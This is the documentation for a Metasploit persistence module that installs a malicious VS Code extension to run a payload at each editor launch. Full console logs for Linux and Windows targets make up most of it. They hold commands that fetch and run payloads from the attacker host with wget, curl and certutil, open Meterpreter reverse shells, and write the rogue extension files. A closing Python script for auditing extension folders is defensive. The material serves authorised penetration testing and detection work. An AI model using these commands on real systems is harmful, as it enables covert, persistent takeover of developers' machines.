documentation/modules/exploit/multi/persistence/vscode_extension.md
This module installs a malicious VS Code extension into the target's VS Code extensions directory. The extension executes the payload each time VS Code is launched, providing persistent code execution. Supports VS Code, VS Code Insiders, VSCodium, VS Code Server, and Cursor.
Tested against 1.120.0 on Kali and Windows 10.
use exploit/multi/persistence/vscode_extension
run
Name of the extension (Random if left blank). Defaults to ``.
Publisher name for the extension (Random if left blank). Defaults to ``.
Description of the extension (Random if left blank). Defaults to ``.
User to target, or current user if blank (Random if left blank). Defaults to ``.
Local path to an icon file (PNG) to include with the extension. Defaults to no icon.
Original Shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO jNobBPgs --no-check-certificate http://1.1.1.1:8082/l; chmod +x jNobBPgs; ./jNobBPgs& disown
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:60886) at 2026-05-15 08:54:57 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : h00die-kali
OS : Debian (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > set target 1
target => 1
msf exploit(multi/persistence/vscode_extension) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: curl -so ./iMMtopaQ http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./iMMtopaQ;./iMMtopaQ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/vscode_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: /root/.vscode/extensions
[*] Using extension: fkhtvcu.cjfkvxfx-1.0.0
[*] Target user: h00die
[*] Installing to: /root/.vscode/extensions
[*] Creating extension directory: /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] Creating directory /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0 created
[+] Wrote package.json to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/package.json
[+] Wrote extension.js to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/extension.js
[+] Wrote payload to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/external
[*] Reading extensions.json...
[+] Registered extension in /root/.vscode/extensions/extensions.json
[!] VS Code is currently running - restart VS Code to activate the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260515.5724/h00die-kali_20260515.5724.rc
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.19.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:60160) at 2026-05-15 08:57:46 -0400
Original Shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/sDEHsFj37VRR4ySrr8_b_w & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /sDEHsFj37VRR4ySrr8_b_w
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Client 2.2.2.2 requested /sDEHsFj37VRR4ySrr8_b_w
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:64885) at 2026-05-15 08:37:21 -0400
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-3PTMHF3\h00die
meterpreter > sysinfo
Computer : DESKTOP-3PTMHF3
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set target 0
target => 0
msf exploit(multi/persistence/vscode_extension) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\VGCHkxyx.exe & start /B %TEMP%\VGCHkxyx.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(multi/persistence/vscode_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: C:\Users\h00die\.vscode\extensions
[*] Using extension: oiok.niuvribguy-1.0.0
[*] Target user: h00die
[*] Installing to: C:\Users\h00die\.vscode\extensions
[*] Creating extension directory: C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] Creating directory C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0 created
[+] Wrote package.json to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\package.json
[+] Wrote extension.js to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\extension.js
[+] Wrote payload to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\external
[*] Reading extensions.json...
[+] Registered extension in C:\Users\h00die\.vscode\extensions\extensions.json
[*] VS Code is not running - launch it to trigger the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/DESKTOP-3PTMHF3_20260515.4157/DESKTOP-3PTMHF3_20260515.4157.rc
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (248902 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:65022) at 2026-05-15 08:42:16 -0400
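A defender-side audit for the on-disk layout that both runs above log (a `publisher.name-version` folder holding `package.json`, `extension.js` and a payload file named `external`), added here as an example and not part of the module or its documentation. The function names, the startup-activation check and the `.vsixmanifest` check are assumptions of this example, not behaviour confirmed by the page.

```python
import json
import sys
from pathlib import Path

# VS Code activation events that fire on every editor launch.
STARTUP_EVENTS = {"*", "onStartupFinished"}


def audit_extension(folder):
    """Return a list of reasons why one extension folder deserves manual review."""
    folder = Path(folder)
    reasons = []
    # Both runs on this page log the payload being written as <extension>/external.
    if (folder / "external").is_file():
        reasons.append("file named 'external' inside the extension folder")
    try:
        manifest = json.loads((folder / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return reasons + ["package.json missing or unparsable"]
    events = manifest.get("activationEvents") if isinstance(manifest, dict) else None
    events = {e for e in events if isinstance(e, str)} if isinstance(events, list) else set()
    # Assumption: extensions installed from a VSIX or the gallery keep a .vsixmanifest.
    sideloaded = not (folder / ".vsixmanifest").exists()
    if sideloaded and events & STARTUP_EVENTS:
        reasons.append("no .vsixmanifest and activates on every launch")
    return reasons


def audit_extensions_dir(ext_dir):
    """Map folder name -> reasons for every flagged folder under an extensions directory."""
    root = Path(ext_dir)
    findings = {}
    if not root.is_dir():
        return findings
    for folder in sorted(root.iterdir()):
        if folder.is_dir():
            reasons = audit_extension(folder)
            if reasons:
                findings[folder.name] = reasons
    return findings


if __name__ == "__main__":
    # Default matches the <home>/.vscode/extensions paths shown in the output above.
    roots = sys.argv[1:] or [Path.home() / ".vscode" / "extensions"]
    for root in roots:
        for name, reasons in audit_extensions_dir(root).items():
            print(f"{root}/{name}: " + "; ".join(reasons))
```

Pass other extension directories as arguments to cover the other editors the module supports. A flagged folder is a lead for manual review, not proof of compromise.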